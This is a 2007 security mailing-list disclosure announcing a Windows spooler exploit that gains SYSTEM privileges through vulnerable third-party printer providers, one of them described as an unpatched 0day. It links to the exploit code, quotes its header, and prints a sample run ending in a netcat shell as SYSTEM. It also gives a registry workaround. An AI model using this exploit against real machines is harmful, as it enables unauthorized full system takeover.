Full Disclosure mailing list archives
Universal printer provider exploit for Windows
From: "Andres Tarasco" <atarasco () gmail com>
Date: Mon, 29 Jan 2007 11:42:35 +0100
We have developed a new exploit that should allow code execution as SYSTEM with the following software: - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED -0day!!! - Citrix Metaframe - cpprov.dll - FIXED - Novell (nwspool.dll - CVE-2006-5854 - untested. pls give feedback) More information at : http://www.514.es/2007/01/universal_exploit_for_vulnerab.html (spanish) exploit code: http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip /* Title: Universal exploit for vulnerable printer providers (spooler service). Vulnerability: Insecure EnumPrintersW() calls Author: Andres Tarasco Acuña - atarasco () 514 es Website: http://www.514.es This code should allow to gain SYSTEM privileges with the following software: blink !blink! blink! - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED -0day!!! - Citrix Metaframe - cpprov.dll - FIXED - Novell (nwspool.dll - CVE-2006-5854 - untested) - More undisclosed stuff =) If this code crashes your spooler service (spoolsv.exe) check your "vulnerable" printer providers at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers Workaround: Trust only default printer providers "Internet Print Provider" and "LanMan Print Services" and delete the other ones. And remember, if it doesnt work for you, tweak it yourself. Do not ask D:\Programación\EnumPrinters\Exploits>testlpc.exe [+] Citrix Presentation Server - EnumPrinterW() Universal exploit [+] Exploit coded by Andres Tarasco - atarasco () 514 es [+] Connecting to spooler LCP port \RPC Control\spoolss [+] Trying to locate valid address (1 tries) [+] Mapped memory. Client address: 0x003d0000 [+] Mapped memory. Server address: 0x00a70000 [+] Targeting return address to : 0x00A700A7 [+] Writting to shared memory... [+] Written 0x1000 bytes [+] Exploiting vulnerability.... [+] Exploit complete. Now Connect to 127.0.0.1:51477 D:\Programación\EnumPrinters>nc localhost 51477 Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>whoami NT AUTHORITY\SYSTEM regards, Andres Tarasco
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Universal printer provider exploit for Windows Andres Tarasco (Jan 29)